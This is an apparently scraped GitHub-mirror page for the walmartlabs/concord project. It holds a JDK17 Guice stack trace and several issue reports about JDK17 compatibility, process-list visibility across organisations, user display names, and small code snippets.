        at com.google.common.cache.LocalCache.get(LocalCache.java:3951)
        at com.google.common.cache.LocalCache.getOrLoad(LocalCache.java:3973)
        at com.google.common.cache.LocalCache$LocalLoadingCache.get(LocalCache.java:4957)
        at com.google.common.cache.LocalCache$LocalLoadingCache.getUnchecked(LocalCache.java:4963)
        at com.google.inject.internal.FailableCache.get(FailableCache.java:54)
        at com.google.inject.internal.ConstructorInjectorStore.get(ConstructorInjectorStore.java:49)
        at com.google.inject.internal.ConstructorBindingImpl.initialize(ConstructorBindingImpl.java:155)
        at com.google.inject.internal.InjectorImpl.initializeBinding(InjectorImpl.java:592)
        at com.google.inject.internal.AbstractBindingProcessor$Processor.initializeBinding(AbstractBindingProcessor.java:173)
        at com.google.inject.internal.AbstractBindingProcessor$Processor.lambda$scheduleInitialization$0(AbstractBindingProcessor.java:160)
        at com.google.inject.internal.ProcessedBindingData.initializeBindings(ProcessedBindingData.java:49)
        at com.google.inject.internal.InternalInjectorCreator.initializeStatically(InternalInjectorCreator.java:124)
        at com.google.inject.internal.InternalInjectorCreator.build(InternalInjectorCreator.java:108)
        at com.google.inject.Guice.createInjector(Guice.java:87)
        at com.google.inject.Guice.createInjector(Guice.java:69)
        at com.google.inject.Guice.createInjector(Guice.java:59)
        at com.walmartlabs.concord.runtime.v2.runner.InjectorFactory.create(InjectorFactory.java:105)
        at com.walmartlabs.concord.cli.Run.call(Run.java:223)
        at com.walmartlabs.concord.cli.Run.call(Run.java:1)
        at picocli.CommandLine.executeUserObject(CommandLine.java:1783)
        at picocli.CommandLine.access$900(CommandLine.java:145)
        at picocli.CommandLine$RunLast.executeUserObjectOfLastSubcommandWithSameParent(CommandLine.java:2150)
        at picocli.CommandLine$RunLast.handle(CommandLine.java:2144)
        at picocli.CommandLine$RunLast.handle(CommandLine.java:2108)
        at picocli.CommandLine$AbstractParseResultHandler.execute(CommandLine.java:1975)
        at picocli.CommandLine.execute(CommandLine.java:1904)
        at com.walmartlabs.concord.cli.Main.main(Main.java:29)
Caused by: java.lang.IllegalStateException: Unable to load cache item
        at com.google.inject.internal.cglib.core.internal.$LoadingCache.createEntry(LoadingCache.java:79)
        at com.google.inject.internal.cglib.core.internal.$LoadingCache.get(LoadingCache.java:34)
        at com.google.inject.internal.cglib.core.$AbstractClassGenerator$ClassLoaderData.get(AbstractClassGenerator.java:119)
        at com.google.inject.internal.cglib.core.$AbstractClassGenerator.create(AbstractClassGenerator.java:294)
        at com.google.inject.internal.cglib.reflect.$FastClass$Generator.create(FastClass.java:65)
        at com.google.inject.internal.BytecodeGen.newFastClassForMember(BytecodeGen.java:258)
        at com.google.inject.internal.BytecodeGen.newFastClassForMember(BytecodeGen.java:207)
        at com.google.inject.internal.DefaultConstructionProxyFactory.create(DefaultConstructionProxyFactory.java:49)
        at com.google.inject.internal.ProxyFactory.create(ProxyFactory.java:156)
        at com.google.inject.internal.ConstructorInjectorStore.createConstructor(ConstructorInjectorStore.java:94)
        at com.google.inject.internal.ConstructorInjectorStore.access$000(ConstructorInjectorStore.java:30)
        at com.google.inject.internal.ConstructorInjectorStore$1.create(ConstructorInjectorStore.java:38)
        at com.google.inject.internal.ConstructorInjectorStore$1.create(ConstructorInjectorStore.java:34)
        at com.google.inject.internal.FailableCache$1.load(FailableCache.java:43)
        at com.google.common.cache.LocalCache$LoadingValueReference.loadFuture(LocalCache.java:3527)
        at com.google.common.cache.LocalCache$Segment.loadSync(LocalCache.java:2276)
        at com.google.common.cache.LocalCache$Segment.lockedGetOrLoad(LocalCache.java:2154)
        at com.google.common.cache.LocalCache$Segment.get(LocalCache.java:2044)
        ... 27 more
Caused by: java.lang.NoClassDefFoundError: Could not initialize class com.google.inject.internal.cglib.core.$MethodWrapper
        at com.google.inject.internal.cglib.core.$DuplicatesPredicate.evaluate(DuplicatesPredicate.java:104)
        at com.google.inject.internal.cglib.core.$CollectionUtils.filter(CollectionUtils.java:52)
        at com.google.inject.internal.cglib.reflect.$FastClassEmitter.<init>(FastClassEmitter.java:69)
        at com.google.inject.internal.cglib.reflect.$FastClass$Generator.generateClass(FastClass.java:77)
        at com.google.inject.internal.cglib.core.$DefaultGeneratorStrategy.generate(DefaultGeneratorStrategy.java:25)
        at com.google.inject.internal.cglib.core.$AbstractClassGenerator.generate(AbstractClassGenerator.java:332)
        at com.google.inject.internal.cglib.core.$AbstractClassGenerator$ClassLoaderData$3.apply(AbstractClassGenerator.java:96)
        at com.google.inject.internal.cglib.core.$AbstractClassGenerator$ClassLoaderData$3.apply(AbstractClassGenerator.java:94)
        at com.google.inject.internal.cglib.core.internal.$LoadingCache$2.call(LoadingCache.java:54)
        at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        at com.google.inject.internal.cglib.core.internal.$LoadingCache.createEntry(LoadingCache.java:61)
        ... 44 more

JDK17 compatibility

build and test with JDK17
upgrade Guava version
OR
the agent should add some extra options when running processes using JDK17 (e.g. --add-opens).

Showing process ids otherwise inaccessible when filtering with org

When logged in with a non admin account , /api/v2/process?initiator=myusername&limit=50 doesn’t return the process id from the org where the user doesn't have access to. But we do see such process ids with this call /api/v2/process?orgName=notmyorgname&&initiator=nonadminuser&projectName=notmyproject&limit=50 . If the user doesn’t have access to the org and the project, should it still show the processes if filtered by the org and project name?

resource owners: Render username with display name to avoid confusion

concord/console2/src/components/organisms/FindUserField2/index.tsx

Line 40 in b48162d

const renderTitle = (e: UserEntry) => (e.displayName ? e.displayName : e.name);

It's possible for multiple users (different usernames) to have the same display name. This can be a tad confusing in the UI when viewing at existing owners of resources. Some format like Display name (username) or Display Name - username should suffice.

	int code = dockerService.start(spec,
	logOutput ? line -> processLog.info("DOCKER: {}", line) : null,
	logOutput ? line -> {
	stdErr.append(line).append("\n");
	processLog.info("DOCKER: {}", line);
	} : null);

	public void suspendForCompletion(List<String> ids) throws Exception {
	delegate().suspendForCompletion(ids.stream()
	.map(UUID::fromString)
	.collect(Collectors.toList()));
	}

walmartlabs / concord Goto Github PK

concord's People

Contributors

Stargazers

Watchers

Forkers

concord's Issues

suspendForCompletion()

process info not returned when using sync: true

returning UUIDs for process IDs only accepting Strings

id vs ids when forks count is 1 vs more than 1

Recommend Projects

Recommend Topics

Recommend Org

`suspendForCompletion()`

process info not returned when using `sync: true`

`id` vs `ids` when forks count is 1 vs more than 1